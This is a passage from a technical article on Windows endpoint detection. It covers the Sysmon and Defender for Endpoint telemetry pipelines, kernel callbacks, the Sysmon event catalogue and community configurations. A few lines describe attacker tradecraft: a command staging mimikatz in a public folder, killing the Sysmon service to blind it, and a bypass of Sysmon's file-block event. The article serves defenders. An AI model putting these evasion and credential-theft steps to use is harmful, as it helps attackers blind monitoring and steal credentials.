A cloud sensor pipeline in Microsoft's regional datacenter (the US for US tenants, the EU for European tenants, the UK for UK tenants) wrote the event into the Advanced Hunting Kusto cluster [@advanced-hunting-overview][@ms-server-endpoints-learn].
A Kusto table -- DeviceProcessEvents -- became queryable within seconds, joined logically across roughly fifty columns to its siblings (DeviceNetworkEvents, DeviceFileEvents, DeviceRegistryEvents, DeviceImageLoadEvents, DeviceEvents) [@deviceprocessevents-table].
A KQL query Maya wrote, or one of Microsoft's built-in detection rules, joined the process row to the network row on (DeviceId, InitiatingProcessId), surfaced the C2 callback inside a ninety-second window, and put the device-isolation button on her screen [@advanced-hunting-overview][@sentinel-xdr-connector].

Each of these seven layers is independently failure-prone. Operating an EDR well -- which is what this article is about -- means knowing which layer produced which artifact, which layer can be tampered with, and which layer is the right one to fix when the row does not arrive.

Key idea: Modern Windows EDR is a seven-layer production pipeline: kernel callback, user-mode aggregator, ETW publisher (or cloud forwarder), TLS-pinned cloud transport, regional Kusto ingest, table write, KQL read. Sysmon and Microsoft Defender for Endpoint are two implementations of the same seven layers, with different design philosophies at every layer.

Why two products, not one

Sysmon and Defender for Endpoint were not designed as a pair. They evolved as competing answers to the same problem -- when prevention fails, what evidence do you give the responder? -- on the same operating system, with the same kernel-callback APIs underneath, and with the same Windows Event Tracing bus as the transport layer in the middle. They converged on a shared trust model only in 2023, when both products began running as protected processes [@sysmon-ms-learn][@falconforce-2022].

That convergence is not coincidence. It is the consequence of a decade of architectural pressure pushing both products toward the same answer: collect at the Microsoft-sanctioned kernel-callback boundary, normalize in user mode, ship over a tamper-resistant transport, and surface to the analyst as a queryable column family. The differences are in the configuration grammar, the cloud-side enrichment, and the trust boundary at the publisher edge. The seven layers are the same. To see why, we have to start in 2014, when Sysmon shipped with three event types.

2. Twelve Years, Two Arcs, One Convergence

Anton Chuvakin, then a research VP at Gartner, named the category in July 2013. His blog post -- preserved on his personal site after Gartner deleted its analyst blogs in late 2023 -- coined the term Endpoint Threat Detection and Response (ETDR) and defined it as "tools primarily focused on detecting and investigating suspicious activities (and traces of such) other problems on hosts/endpoints" [@chuvakin-2013][@wikipedia-edr]. The "T" dropped out of the acronym within eighteen months and the field has been called EDR ever since.

Chuvakin's question -- what evidence do you give the responder when prevention fails? -- got two different answers from inside Microsoft over the next decade. One was free, configurable, and ran on every Windows machine the operator wanted to run it on. The other was commercial, cloud-correlated, and only worked if you paid for it. Both started in the same place: at the supported kernel-callback boundary that Microsoft had been steadily building out since Windows XP.

The Sysmon arc: August 2014 to March 2026

Mark Russinovich gave session HTA-T07R at RSA US 2014 -- Malware Hunting with the Sysinternals Tools -- and the methodology he taught (process-tree pivoting, autoruns enumeration, real-time monitoring of file and registry writes) had a natural conclusion: somebody should ship a Sysinternals tool that did all of that, continuously, into the Windows event log [@russinovich-rsa-2014]. The tool shipped in August 2014, written by Russinovich and Thomas Garnier, also of Microsoft. ZDNet's contemporaneous coverage captured the introduction: "Sysmon, written by Russinovich and Thomas Garnier, also of Microsoft, is the 73rd tool in the set... Note: For public release, Sysmon has been reset to version 1.00" [@zdnet-sysmon-2014]. The launch SKU had three event types: process create (EID 1), file-create-time change (EID 2), and network connect (EID 3).

The design philosophy is captured in a single sentence Microsoft Learn still prints on the Sysmon download page -- a sentence whose framing of Sysmon as a publisher that refuses to do detection and refuses to hide is the entire foundation of the SwiftOnSecurity-NextronSystems-Hartong configuration lineage that §5 unpacks; the verbatim quote lands as the §4 PullQuote [@sysmon-ms-learn]. Every detection-engineering corpus in the Windows field -- SwiftOnSecurity's config, Florian Roth's fork, Olaf Hartong's modular system, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of that one design choice.

The version history reads as capability accretion, not architectural change. Sysmon v6 in February 2017 added registry events (EIDs 12-14), process-access (10), file-create (11), pipe events (17-18), file-create-stream-hash (15), and the ServiceConfigurationChange (16) audit of Sysmon's own settings [@sysinternals-blog-v6]. (EID 7 ImageLoad arrived earlier, in Sysmon v2.0 -- the §4 catalogue places it correctly.) Sysmon v10 in June 2019 added DNS-query observation via ETW consumption of Microsoft-Windows-DNS-Client; the v10 release date is recorded in the community-curated Sysmon Version History repository, explicitly marked "Outdated" past v11.10 because its maintainer stopped updating it [@sysmon-version-history]. v13 added ClipboardChange and ProcessTampering. v14 in August 2022 added the first preventive event -- FileBlockExecutable (EID 27) -- making Sysmon something subtly more than a publisher [@diversenok-2022][@hartong-sysmon14-medium].

The architectural inflection landed in June 2023 with Sysmon v15, when the Sysmon service began running as a protected process. BleepingComputer's contemporaneous coverage notes that the service ran as PROTECTED_ANTIMALWARE_LIGHT and the schema bumped to 4.90 with the new FileExecutableDetected event ID 29 [@bleepingcomputer-sysmon15][@hartong-sysmon15-medium]. The Microsoft Learn page now states the change verbatim: "The service runs as a protected process, thus disallowing a wide range of user mode interactions" [@sysmon-ms-learn]. The latest published release at the time of writing is v15.2 on March 26, 2026 (per the Sysmon download page's Published by-line), with twenty-nine event types plus EID 255 (Error) [@sysmon-ms-learn].

The MDE arc: March 2016 to late 2023

Microsoft announced Windows Defender Advanced Threat Protection in a Windows Experience blog post on March 1, 2016 -- "Today, we announce the next step in our efforts to protect our enterprise customers, with a new service, Windows Defender Advanced Threat Protection" [@ms-blog-atp-mar2016]. The service was framed as a cloud-correlated detection-and-investigation layer on top of the Windows 10 sensor, "informed by anonymous information from over 1 billion Windows devices" [@ms-blog-atp-mar2016]. The 2016 product was Windows-only, in-portal, and oriented to detection and investigation only.

The Fall Creators Update in October 2017 broadened the product into prevention: "The Windows Fall Creators Update represents a new chapter in our product evolution as we offer a set of new prevention capabilities designed to stop attacks as they happen and before they have impact. This means that our service will expand beyond detection, investigation, and response, and will now allow companies to use the full power of the Windows security stack for preventative protection" [@ms-blog-atp-jun2017]. Attack Surface Reduction rules, Exploit Guard, and Application Guard joined the platform. So did the Advanced Hunting query surface in 2018 -- KQL on the same Device* tables Maya uses in §1.

The cross-platform reach arrived in March 2019 with macOS support (initially as Microsoft Defender ATP) and was extended to networked Linux and macOS discovery by February 2021 [@securityweek-defender-macos][@bleepingcomputer-defender-linux]. The product was renamed twice. The most-cited rename came at Microsoft Ignite 2020 on September 22, 2020, when the Microsoft Security blog announced the product family rebrand: "Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection)" [@ms-unified-siem-xdr-2020]. The same post renamed Microsoft Threat Protection to Microsoft 365 Defender, O365 ATP to Microsoft Defender for Office 365, and Azure ATP to Microsoft Defender for Identity. The second rename was at Microsoft Ignite 2023 in November 2023, when Microsoft 365 Defender became Microsoft Defender XDR, announced as part of the broader product rebrand at Ignite 2023 [@defender-xdr-ms-learn][@ms-ignite-2023-blog].The Ignite 2023 rebrand did not change the KQL substrate, the Device* schema, or the Sentinel connector contract. It is a marketing relabel on top of a stable cloud surface. Detection engineering teams kept writing queries against DeviceProcessEvents exactly as they did the day before the rename.

The configuration-lineage arc

A third arc ran in parallel with the two product arcs: the community-maintained Sysmon configurations that turned Sysmon from a kernel-callback publisher into a deployment-ready detection sensor.

The historical root is SwiftOnSecurity's sysmon-config repository, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README's design intent is succinct: "This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing" [@github-swiftonsecurity]. The repository remains the most-cited Sysmon-configuration starting point in the SOC industry.

Florian Roth, working under the handle @Neo23x0, forked SwiftOnSecurity's config in January 2018 (the exact creation date is now obscured by a 2021 rename -- see the sidenote below). The fork added blocking-rule support for Sysmon v14, an actively-maintained set of community pull-request merges, and the export-block.xml variant that ships the v14+ FileBlockExecutable rules. The README states the lineage verbatim: "This is a forked and modified version of @SwiftOnSecurity's sysmon config. ... We merged most of the 30+ open pull requests" [@github-neo23x0]. The current maintainer roster lists Florian Roth, Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali.

Olaf Hartong's sysmon-modular was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository takes a different design approach: instead of one monolithic XML config, Hartong ships a per-EID-and-per-technique module library that compiles down into one of several pre-generated artifacts -- sysmonconfig.xml (default), sysmonconfig-with-filedelete.xml (default plus archive), sysmonconfig-excludes-only.xml (verbose), sysmonconfig-research.xml (super-verbose, with the warning "really DO NOT USE IN PRODUCTION!"), and the load-bearing sysmonconfig-mde-augment.xml whose entire design intent is to fill the gaps in Defender for Endpoint's collection surface [@github-hartong-modular].Olaf Hartong and Henri Hambartsumyan, the two FalconForce researchers who reverse-engineered Defender for Endpoint in 2022 and surfaced CVE-2022-23278, also maintain olafhartong/sysmon-modular. This is the dual identity that makes the sysmonconfig-mde-augment.xml config uniquely informed: the same people who learned where MDE's collection truncates Sysmon's manifest also published the config that fills those gaps [@falconforce-2022][@github-hartong-modular].

The Neo23x0 repository was renamed in 2021. The current https://github.com/Neo23x0/sysmon-config URL HTTP-301s to https://github.com/NextronSystems/sysmon-config, and the GitHub REST API returns a created_at of 2021-07-24T06:19:41Z with a parent field pointing to SwiftOnSecurity/sysmon-config [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; only the organizational owner moved from Florian Roth's personal handle to his employer Nextron Systems.

By 2023, then, two product arcs and one configuration arc had converged on the same baseline: kernel callbacks (PsSetCreateProcessNotifyRoutineEx, ObRegisterCallbacks, CmRegisterCallbackEx, Filter Manager minifilters) on the input side; an Antimalware-PPL protected service on the host; an ETW or TLS-pinned cloud transport in the middle; and KQL on Device* tables on the reader side. The convergence was structural, not coincidental. To see why both arcs landed in the same place, we have to start at the kernel-callback boundary -- where Sysmon's input lives.

3. Sysmon Architecture: Kernel Collection, ETW Emission, Event Log Persistence

If you have ever read that Sysmon is an "ETW-based event source," you have read something that is half-true. The half that is right is the output side: Sysmon publishes its events through an ETW provider called Microsoft-Windows-Sysmon, and the rest of the system -- including the Windows Event Log service -- subscribes to that provider. The half that is wrong is the input side. Sysmon does not get most of its raw observations from ETW. It gets them from five kernel-callback families and one Filter Manager minifilter, with two narrow ETW-consumer exceptions (DNS-Client for EID 22; the WMI activity provider for EIDs 19-21).

This distinction is small enough that most blog posts skip it and big enough that getting it wrong leads to architectural confusion. The split between collection (how data enters the Sysmon driver) and emission (how data leaves the Sysmon service) is the first thing to get straight before anything else makes sense.

The in-kernel, low-overhead, manifest-described tracing infrastructure built into Windows since 2000. Providers publish structured events; controllers start trace sessions and select which providers to enable; consumers receive events live or read them from `.etl` files. Sysmon uses ETW as its *output* bus -- its kernel driver hands events to the user-mode service via a private ETW session -- and as a small input source for the DNS-Client kernel provider (EID 22) and the WMI activity provider (EIDs 19-21). A Microsoft-sanctioned ring-0 API for observing operating-system events without patching the System Service Descriptor Table. The Windows kernel exposes a small set of named callback APIs -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load (with a `SystemModeImage` bit that distinguishes kernel drivers from user-mode DLLs), `PsSetCreateThreadNotifyRoutineEx` for thread creation (with a remote-thread flag), `ObRegisterCallbacks` for handle-rights filtering against `PsProcessType` and `PsThreadType`, `CmRegisterCallbackEx` for registry operations, and the Filter Manager minifilter framework for file-system I/O. A driver registers a function pointer; the kernel invokes it on the corresponding event with the structured context. PatchGuard tolerates kernel callbacks; it does not tolerate SSDT patching [@wikipedia-kpp][@pssetcreateex-msdn][@ms-wdk-kernel-callbacks]. The file-system filter-driver framework (`FltMgr.sys`) that hosts minifilter drivers between the I/O manager and the file-system stack. Each minifilter declares an *altitude* (a 16-bit priority) and receives notifications for pre- and post-operation hooks on file create, file write, set-information, and set-security. Both `SysmonDrv.sys` and `WdFilter.sys` are minifilters; they coexist at different altitudes without colliding [@sysmon-ms-learn].

Five collection mechanisms, one ETW publisher

The Microsoft Learn page for Sysmon enumerates the event IDs and describes them at the what level; the how (which kernel API actually produced each event) is documented partly in the API references for each callback API and partly in the source code of Sysmon's open Linux port, microsoft/SysmonForLinux, which reuses Sysinternals' shared C++ rule-engine for parsing the same XML schema and translating it onto eBPF instead of kernel callbacks [@github-sysmon-linux][@sysmon-ms-learn]. The Windows port is closed source, but Sysinternals' design has been documented enough -- across the RSA 2014 talk, the Diversenok 2022 reverse-engineering writeup, and the SysmonForLinux source -- that the collection-mechanism inventory is unambiguous.

The five mechanisms are:

Mechanism	API or framework	Sysmon EIDs produced
Process-lifetime callback	`PsSetCreateProcessNotifyRoutineEx`	1 (ProcessCreate), 5 (ProcessTerminate)
Image-load callback	`PsSetLoadImageNotifyRoutine`	7 (ImageLoad); 6 (DriverLoad, distinguished by the `IMAGE_INFO.SystemModeImage` flag on the kernel-mode image)
Thread-creation callback	`PsSetCreateThreadNotifyRoutineEx` (with the `PS_CREATE_THREAD_NOTIFY_FLAG_CREATE_REMOTE` flag in `CREATE_THREAD_NOTIFY_INFO`)	8 (CreateRemoteThread)
Object Manager callback	`ObRegisterCallbacks` against `PsProcessType`	10 (ProcessAccess)
Registry callback	`CmRegisterCallbackEx`	12 (Registry Object Create/Delete), 13 (Registry Value Set), 14 (Registry Key/Value Rename)
Filter Manager minifilter	`FltRegisterFilter` against `FltCreate`/`FltClose`/`FltSetInformation` -- ordinary file system, and the Named Pipe File System (NPFS, `\Device\NamedPipe`) at a different altitude	11 (FileCreate), 15 (FileCreateStreamHash), 17 (PipeEvent Created), 18 (PipeEvent Connected), 23 (FileDelete archived), 26 (FileDeleteDetected), 27 (FileBlockExecutable), 28 (FileBlockShredding), 29 (FileExecutableDetected)

The five-mechanism framing collapses thread-creation and Object Manager callbacks into one architectural family ("process and thread observation via Microsoft-sanctioned callbacks"); a stricter count is six (process-lifetime, image-load, thread-creation, object-handle, registry, minifilter). Either count is defensible; what matters is keeping the API attribution honest: PsSetCreateThreadNotifyRoutineEx is the canonical remote-thread observer, ObRegisterCallbacks(PsProcessType) is the canonical handle-rights filter, and NPFS minifiltering -- not ObRegisterCallbacks -- is what observes named-pipe creation and connection.

The sixth source -- the ETW consumer path -- is special. For DNS queries (EID 22), Sysmon does not register a kernel callback. It subscribes as a consumer of the Microsoft-published Microsoft-Windows-DNS-Client ETW provider, parses the structured DNS events, and republishes them through its own ETW provider with the Sysmon enrichments applied [@sysmon-version-history]. DNS-Client is the only event Sysmon consumes from a Microsoft-published kernel ETW provider; the WmiEvent family (EIDs 19-21) is implemented in a similar consumer style against the WMI activity provider's user-mode tracing surface, which is why the §4 catalogue marks those rows as "WMI ETW provider consumer." Either way, ETW consumption is the input-side exception, not the rule: five kernel-callback families do the bulk of the work, and ETW is the input only for a small, deliberately-chosen set of events.The Sysmon ETW provider has the GUID {5770385F-C22A-43E0-BF4C-06F5698FFBD9}. Microsoft Learn does not enumerate this GUID on the Sysmon page; the authoritative on-host discovery command is logman query providers Microsoft-Windows-Sysmon, which returns the GUID, the keywords mask, and the registered processes. Pavel Yosifovich's community ETW-provider catalogue EtwExplorer mirrors the value [@etwexplorer-sysmon-guid], with the on-host logman command remaining the authority of last resort.

The ProcessCreate path, step by step

The clearest way to see how the pieces fit is to trace one event. Sysmon's process-create handling is the most-quoted EID in the manifest -- it is the EID that produces Maya's row in §1 -- and it follows the canonical kernel-callback pattern that Microsoft codified in PsSetCreateProcessNotifyRoutineEx:

// Conceptual pseudocode for SysmonDrv's process-create path.
// Real Sysmon source for Windows is closed; the Linux port is open.
// This is the contract documented in the WDK reference for
// PsSetCreateProcessNotifyRoutineEx.

NTSTATUS SysmonDrvEntry(PDRIVER_OBJECT DriverObject, ...) {
    // 1. Register the create-process callback. PatchGuard tolerates this.
    PsSetCreateProcessNotifyRoutineEx(SysmonProcessCreateCb, FALSE);
    // ... other callbacks registered similarly ...
    return STATUS_SUCCESS;
}

VOID SysmonProcessCreateCb(
    HANDLE  ParentId,
    HANDLE  ProcessId,
    PPS_CREATE_NOTIFY_INFO  CreateInfo  // NULL on process exit
) {
    if (CreateInfo == NULL) {
        // Process exit: emit EID 5 (ProcessTerminate).
        SysmonEmitEventEID5(ProcessId);
        return;
    }
    // Process create. Apply the XML rule engine: does this process
    // match any <Include> rule, after evaluating <Exclude> overrides?
    if (!SysmonRuleMatch(EID_1, CreateInfo)) {
        return;  // Filtered: produce no event.
    }
    // Enrich with parent process, command line, image hash, integrity
    // level, user SID, ProcessGuid, and session identifiers, then ship
    // through the private Microsoft-Windows-Sysmon ETW publisher.
    SysmonEmitEventEID1(CreateInfo);
}

Four properties of the path matter. First, the callback is invoked synchronously on the thread that issued the CreateProcessW call, before the new process's first instruction runs; the parent and child PIDs are both known, but the new process has not yet executed any user-mode code. Second, the callback is rate-limited only by your rule engine -- there is no built-in throttle, and a verbose <Include> rule on a high-process-turnover host can saturate the ETW session. Third, the callback runs at IRQL = PASSIVE_LEVEL, so it can do file I/O (which the driver needs for hashing) but it must do that I/O carefully to avoid deadlock on the very file system it is monitoring. Fourth, the Sysmon service runs as a separate user-mode process; if the service has crashed or been suspended, the driver continues to emit ETW events into a session with no listener and they evaporate.

Sysmon's per-process unique identifier, formatted as a 128-bit GUID and recorded as the `ProcessGuid` field on every event that names a process. Unlike a Windows process ID, the ProcessGuid survives PID reuse and uniquely identifies a process across its lifetime [@sysmon-ms-learn]; SOC tooling commonly joins on `(DeviceId, ProcessGuid)` to reconstruct process trees and avoid the PID-reuse race condition that plagues raw `ProcessId` joins.

Where the events go

Once the user-mode Sysmon.exe service has labelled the event, it does two things. First, it writes the event to the Windows event log -- specifically to Applications and Services Logs/Microsoft/Windows/Sysmon/Operational per Microsoft Learn's verbatim statement: "On Vista and higher, events are stored in Applications and Services Logs/Microsoft/Windows/Sysmon/Operational" [@sysmon-ms-learn]. Second, the same event is also visible to any ETW real-time consumer subscribed to Microsoft-Windows-Sysmon -- which is how downstream collectors (Windows Event Forwarding, Splunk's universal forwarder, the Elastic Endpoint integration, Wazuh's Windows agent) actually pick the events up, rather than tailing the event log XML.

flowchart LR K1["PsSetCreateProcessNotifyRoutineEx"] --> D[SysmonDrv.sys] K2["PsSetLoadImageNotifyRoutine"] --> D K3["PsSetCreateThreadNotifyRoutineEx"] --> D K4["ObRegisterCallbacks (PsProcessType)"] --> D K5["CmRegisterCallbackEx"] --> D K6["FltRegisterFilter (file system + NPFS)"] --> D K7["ETW consumer: DNS-Client + WMI activity"] --> D D --> P["ETW publisher: Microsoft-Windows-Sysmon"] P --> S[Sysmon.exe service] S --> L["Applications and Services Logs / Microsoft / Windows / Sysmon / Operational"] P --> R["Real-time ETW consumers (WEF, Splunk UF, Wazuh, Elastic)"]

This is the first aha moment. Sysmon is not "ETW based" in the way most blog posts imply. Sysmon is a kernel driver that uses ETW as its IPC bus to user mode, and as a special-case consumer for one provider (DNS-Client). The reason Sysmon needed a kernel driver in the first place is that ETW alone could not see what the kernel callbacks see: ETW could not, in 2014, deliver a synchronous parent-PID-and-image-hash structure at process create time. Sysmon's driver does that work; ETW transports the result.

The protected-process gate added in v15 (June 2023) closed the most-trivial blinding attack -- a SYSTEM-privilege process can no longer issue OpenProcess(PROCESS_TERMINATE) against the Sysmon service to silence it. Raising the bar to a kernel-mode primitive does not eliminate the attack class, but it does change the cost model. The protected-process gate is the architectural inflection that distinguishes pre-v15 Sysmon (trivially blindable) from post-v15 Sysmon (requires a kernel primitive or a BYOVD chain) [@sysmon-ms-learn][@bleepingcomputer-sysmon15].

Five collection mechanisms, one ETW publisher, one event log. That is the input side. Now the catalogue.

4. The Sysmon Event Catalogue: Twenty-Nine IDs and Their Version Gating

Run sysmon -s on any v15.2 host and you get an XML schema enumerating twenty-nine event types plus EID 255 (Error). Every detection-engineering corpus in the field -- SwiftOnSecurity's config, Florian Roth's fork, Hartong's modular, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of this single schema [@sysmon-ms-learn][@github-sigma][@github-otrf-thp]. Learn the catalogue once and the rest of the Sysmon toolchain unfolds from it.

A naming disambiguation is worth doing first, because the colloquial event names the field uses (and that the topic input for this article uses verbatim) differ from the canonical Microsoft Learn names. "RegistrySet" is a colloquial pun on RegistryEvent (Value Set), EID 13. "DnsQuery" is a colloquial shorthand for DNSEvent (DNS query), EID 22. "NamedPipeConnect" is two events at once: PipeEvent (Pipe Created), EID 17, and PipeEvent (Pipe Connected), EID 18. The article uses the canonical Microsoft Learn names from here on.

Note: Sysmon's manifest names some events as a family with a parenthetical operation: RegistryEvent (Object create and delete) (EID 12), RegistryEvent (Value Set) (EID 13), RegistryEvent (Key and Value Rename) (EID 14). The same pattern applies to the pipe events: PipeEvent (Pipe Created) (EID 17) and PipeEvent (Pipe Connected) (EID 18). When detection-rule tooling references "EID 12-14" or "EID 17-18", these families are what it means. The colloquial single-name forms used elsewhere in the literature are not wrong; they are just less precise. The MDE schema does not preserve the parenthetical operation suffix; it surfaces these as ActionType values inside DeviceRegistryEvents.

The twenty-nine plus one catalogue

The catalogue groups naturally by the collection mechanism that produces each event:

EID	Canonical name	Collection mechanism	Introduced	Maps to (MDE)
1	ProcessCreate	`PsSetCreateProcessNotifyRoutineEx`	v1.0 (Aug 2014)	`DeviceProcessEvents` (`ProcessCreated`)
2	FileCreateTime	Filter Manager	v1.0 (Aug 2014)	`DeviceFileEvents` (`FileCreated`, partial)
3	NetworkConnect	Internal network-callout	v1.0 (Aug 2014)	`DeviceNetworkEvents` (`ConnectionSuccess`)
4	ServiceStateChange	Sysmon-internal	v1.0 (Aug 2014)	(Sysmon-only)
5	ProcessTerminate	`PsSetCreateProcessNotifyRoutineEx`	v1.0 (Aug 2014)	`DeviceProcessEvents` (`ProcessTerminated`)
6	DriverLoad	`PsSetLoadImageNotifyRoutine` (kernel-mode case via `IMAGE_INFO.SystemModeImage`)	v2.0 (2015)	`DeviceEvents` (`DriverLoad`)
7	ImageLoad	`PsSetLoadImageNotifyRoutine`	v2.0 (2015)	`DeviceImageLoadEvents`
8	CreateRemoteThread	`PsSetCreateThreadNotifyRoutineEx` (with `CREATE_REMOTE` flag)	v3.0 (2016)	`DeviceEvents` (truncated)
9	RawAccessRead	`\Device\Harddisk*` write filter	v3.0 (2016)	(Sysmon-only)
10	ProcessAccess	`ObRegisterCallbacks` (PsProcessType)	v6.0 (Feb 2017)	`DeviceEvents` (GrantedAccess truncated)
11	FileCreate	Filter Manager	v6.0 (Feb 2017)	`DeviceFileEvents`
12	RegistryEvent (Object create/delete)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
13	RegistryEvent (Value Set)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
14	RegistryEvent (Key/Value Rename)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
15	FileCreateStreamHash	Filter Manager	v6.0 (Feb 2017)	(Sysmon-only)
16	ServiceConfigurationChange	Sysmon-internal	v6.0 (Feb 2017)	(Sysmon-only)
17	PipeEvent (Pipe Created)	Filter Manager minifilter on NPFS (`\Device\NamedPipe`)	v6.0 (Feb 2017)	(Sysmon-only)
18	PipeEvent (Pipe Connected)	Filter Manager minifilter on NPFS (`\Device\NamedPipe`)	v6.0 (Feb 2017)	(Sysmon-only)
19	WmiEvent (filter)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
20	WmiEvent (consumer)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
21	WmiEvent (consumer-to-filter binding)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
22	DNSEvent (DNS query)	ETW consumer of `Microsoft-Windows-DNS-Client`	v10.0 (Jun 2019)	`DeviceNetworkEvents` (`DnsQuery`)
23	FileDelete (archive)	Filter Manager	v11.10 (Jun 2020)	`DeviceFileEvents` (partial)
24	ClipboardChange	RDP and Win32 clipboard hooks	v13.0 (2021; disputed)	(Sysmon-only)
25	ProcessTampering	Image-load and `WriteProcessMemory` heuristic	v13.0 (2021; disputed)	(Sysmon-only)
26	FileDeleteDetected	Filter Manager (non-archiving)	v13.30 (2022)	`DeviceFileEvents`
27	FileBlockExecutable	Filter Manager (blocking)	v14.0 (Aug 2022)	(Sysmon-only)
28	FileBlockShredding	Filter Manager (blocking)	v14.10 (2022)	(Sysmon-only)
29	FileExecutableDetected	Filter Manager	v15.0 (Jun 2023)	`DeviceFileEvents`
255	Error	Sysmon-internal	v1.0 (Aug 2014)	(Sysmon-only)

The Sysmon Version History repository's "Outdated" disclaimer ("I didn't find enough time to update this repo - sorry") means the v12 vs v13 boundary for ClipboardChange and ProcessTampering is community-disputed. The canonical Microsoft Learn page does not enumerate version-introduction metadata per event ID. The dates in the table for EIDs 24 and 25 are best-effort community attributions and should be treated as approximate until Microsoft publishes a per-EID version history [@sysmon-version-history][@sysmon-ms-learn].

The design intent, in one sentence

The catalogue exists because Sysmon's design choice -- the one Microsoft Learn still prints today -- explicitly refuses to do detection. The publisher emits structured events; the detection logic is somebody else's problem.

Sysmon does not provide analysis of the events it generates, nor does it attempt to hide itself from attackers.

This is the sentence that explains the entire SwiftOnSecurity-NextronSystems-Hartong configuration lineage [@sysmon-ms-learn]. If Sysmon refuses to do detection, somebody has to write the rules. Three somebodies did, and they wrote three different sets, and the rest of §5 is about the trade-offs between them.

What EID 27 is, and what it is not

The 2022 introduction of FileBlockExecutable (EID 27) was the first preventive event in Sysmon's history. Olaf Hartong's contemporaneous writeup and Diversenok's independent reproduction both describe what the event does, and the mechanism is more subtle than "the I/O is denied." The Sysmon minifilter intercepts the file-handle close operation. If the rule matches and the file content carries an MZ/PE header, Sysmon logs EID 27 and marks the file for deletion via FILE_DISPOSITION_INFORMATION [@diversenok-2022][@hartong-sysmon14-medium]. The attacker's cmd /c copy mimikatz.exe C:\Users\Public\ produces no command-line error. The copy appears to succeed. The file is then deleted at handle-close time. Hartong's writeup captures the user-visible effect verbatim: "*While there is no error on the command line, the file is not written to disk*" [@hartong-sysmon14-medium]. Diversenok's reverse-engineering reads: "*Sysmon monitors and deletes files on closing instead of writing*" [@diversenok-2022]. The closing-time semantics is the structural reason Diversenok's Bypass #1 (split create-close from open-write-close) works at all; the bypass is incoherent under an Access Denied-at-create model and obvious under the close-time-delete model.

This is a confined preventive surface, and it should not be confused with the much larger Defender exploit-protection blocking surface. Defender exploit protection mitigations include arbitrary-code-guard, control-flow-guard enforcement, and ASR rules -- they sit inside the Defender Antivirus and MDE stacks. EID 27's blocking is one Sysmon minifilter making a file-create decision; it is not a general-purpose application-allow-list, and it is not a substitute for Windows Defender Application Control. Hartong's writeup is explicit about the scope -- "the FileBlockExecutable event" -- as is Diversenok's: the introduction reads "the update introduced the first preventive measure -- the FileBlockExecutable event (ID 27)" [@diversenok-2022].

Twenty-nine events, four hardening releases, one schema. The catalogue is only useful if you configure Sysmon to emit subsets of it, and configuration is where the field's three lineages diverged.

5. Three Canonical Sysmon Configurations

Every production Sysmon deployment in the field is forked from one of three repositories. The lineage matters, and one of the things this article fixes is a common attribution error -- "Florian Roth wrote the canonical Sysmon config" is in widespread circulation, but the canonical root is SwiftOnSecurity's repository, and Roth's repo is a 2018 fork of it.

The open-source generic-signature-format authored by Florian Roth and his collaborators at Nextron Systems; the SIEM-and-EDR field's vendor-neutral detection-rule lingua franca. The `SigmaHQ/sigma` repository ships over 3,000 detection rules covering the Windows kernel-callback surface (heavily Sysmon-aware), Linux audit, macOS unified log, AWS CloudTrail, Microsoft 365, and other event sources. Sigma rules are written once and compiled by community converters into the per-tool query languages (KQL for Defender XDR / Sentinel, SPL for Splunk, EQL for Elastic) [@github-sigma].

SwiftOnSecurity/sysmon-config (February 2017)

The historical root. The pseudonymous account SwiftOnSecurity published the first widely-cited Sysmon configuration template on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README's design intent is the single sentence still printed at the top of the repo: "This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing" [@github-swiftonsecurity]. The template emphasises clarity over coverage; the XML is heavily commented, and the rule structure follows a deliberately conservative pattern of <Include> blocks per technique.

SwiftOnSecurity's config is the most-cited starting point for Sysmon deployments worldwide and the one that detection-engineering tutorials default to. It is also the parent of every other Sysmon-config repository on GitHub, in the literal GitHub-fork sense -- the GitHub REST API for both NextronSystems/sysmon-config and (via the historical fork-graph) other community configs returns SwiftOnSecurity/sysmon-config as the parent [@github-nextronsystems-meta].

Neo23x0/sysmon-config, now NextronSystems/sysmon-config (January 2018, renamed 2021)

Florian Roth, working under his GitHub handle @Neo23x0, forked SwiftOnSecurity's config in January 2018 and added blocking-rule support for Sysmon v14 plus the merged community pull-request set. The README's design intent reads: "This is a forked and modified version of @SwiftOnSecurity's sysmon config. ... We merged most of the 30+ open pull requests" [@github-neo23x0]. The maintainer roster as of the present writing is Florian Roth (@Neo23x0), Tobias Michalski (@humpalum), Christian Burkard (@phantinuss), and Nasreddine Bencherchali (@nas_bench).

The repository ships a blocking variant, sysmonconfig-export-block.xml, that adds <RuleGroup> blocks targeting EID 27 (FileBlockExecutable) and EID 28 (FileBlockShredding) for the most common malware-staging file paths. This is the variant SOC teams deploy when they want Sysmon's preventive surface to participate in the response pipeline as a hard block rather than as a detection-only artifact.

The legacy URL `https://github.com/Neo23x0/sysmon-config` now HTTP-301 redirects to `https://github.com/NextronSystems/sysmon-config`. The GitHub REST API for the current repository returns `created_at: 2021-07-24T06:19:41Z` with `parent: SwiftOnSecurity/sysmon-config`, which means the repository as it now exists was created in mid-2021 when Florian Roth moved it from his personal handle to his employer's organization namespace [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; the move is an organizational one. The exact pre-rename creation date of the original `Neo23x0/sysmon-config` repository is not reliably retrievable from the current API and is best dated as January 2018 based on the README and the fork-history.

olafhartong/sysmon-modular (January 13, 2018)

